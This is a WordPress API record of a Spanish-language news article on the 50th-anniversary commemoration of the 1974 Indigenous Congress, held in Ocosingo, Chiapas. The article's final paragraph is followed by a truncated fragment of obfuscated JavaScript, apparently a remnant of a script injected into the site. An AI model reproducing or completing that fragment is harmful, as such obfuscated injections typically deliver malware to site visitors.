{"id":17734,"date":"2024-09-09T04:41:55","date_gmt":"2024-09-09T04:41:55","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17734"},"modified":"2024-09-09T04:41:56","modified_gmt":"2024-09-09T04:41:56","slug":"conmemoran-en-ocosingo-el-50-aniversario-del-primer-congreso-indigena","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17734","title":{"rendered":"Conmemoran en Ocosingo el 50 Aniversario del Primer Congreso Ind\u00edgena"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240908-WA0007-1024x576.jpg\" alt=\"\" class=\"wp-image-17735\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240908-WA0007-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240908-WA0007-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240908-WA0007-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240908-WA0007.jpg 1152w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>8 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- En el marco del Encuentro Estatal \u201cLos Pueblos Originarios y sus Territorios\u201d, el Rector de la Universidad Intercultural de Chiapas (Unich), Dionicio Toledo Hern\u00e1ndez, dio a conocer que se realiz\u00f3 este fin de semana, la conmemoraci\u00f3n del 50 aniversario del primer Congreso Ind\u00edgena, un hito hist\u00f3rico que tuvo lugar en 1974.<\/p>\n\n\n\n<p>\u201cEstamos justamente celebrando el 50 aniversario del Congreso Ind\u00edgena, el primer encuentro intercultural que tuvieron nuestros pueblos originarios, tseltales, tojolabales, choles en 1974. Es una conmemoraci\u00f3n muy importante y estamos desarrollando ponencias, mesas y ejes de trabajo con relaci\u00f3n a los derechos de los pueblos originarios, su territorio, los movimientos sociales, insurrecci\u00f3n de los pueblos en el estado de Chiapas\u201d, dijo.<\/p>\n\n\n\n<p>Durante el evento, que se llev\u00f3 a cabo en la ciudad de Ocosingo, se presentaron diversas ponencias enfocadas en temas de vital importancia para los pueblos ind\u00edgenas de la regi\u00f3n. Entre los principales t\u00f3picos abordados estuvieron el territorio y el desarrollo de las comunidades ind\u00edgenas, los movimientos sociales y la insurrecci\u00f3n. Adem\u00e1s, se discutieron propuestas para influir en las pol\u00edticas de los nuevos gobiernos federal y estatal.<\/p>\n\n\n\n<p>Este encuentro intercultural no solo rememor\u00f3 los logros y luchas del pasado, sino que tambi\u00e9n sirvi\u00f3 como plataforma para que los pueblos originarios puedan seguir alzando la voz por sus derechos y territorios en la actualidad.<\/p>\n\n\n\n<p>Toledo Hern\u00e1ndez, apunt\u00f3 que en este evento, se tocaron temas que van a incidir en el Segundo Piso de la Cuarta Transformaci\u00f3n de este gobierno, como lo es educaci\u00f3n, pueblos ind\u00edgenas, el territorio, salud, entre otros, \u201cque debemos trabajar conjuntamente con los gobiernos municipal, estatal, federal\u201d.<\/p>\n\n\n\n<p>En este evento, el rector de la UNICH, present\u00f3 el tema: \u201cProceso Hist\u00f3rico De Las Comunidades De La Selva Lacandona\u201d, pero estuvieron otros actores con temas como: Derechos De Los Pueblos Ind\u00edgenas, La Soberan\u00eda Alimentaria Y Los Pueblos Originarios, Afectaci\u00f3n De Los Problemas Del Agua En Los Territorios Y Comunidades Ind\u00edgenas, a la que acudieron m\u00e1s de mil personas de unas 200 comunidades ind\u00edgenas del estado de Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 8 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- En el marco del Encuentro Estatal \u201cLos Pueblos Originarios y sus Territorios\u201d, el Rector de la Universidad Intercultural de Chiapas (Unich), Dionicio Toledo Hern\u00e1ndez, dio a conocer que se realiz\u00f3 este fin de semana, la conmemoraci\u00f3n del 50 aniversario del primer Congreso &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17735,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17734","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17734","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17734"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17734\/revisions"}],"predecessor-version":[{"id":17736,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17734\/revisions\/17736"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17735"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17734"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17734"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17734"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}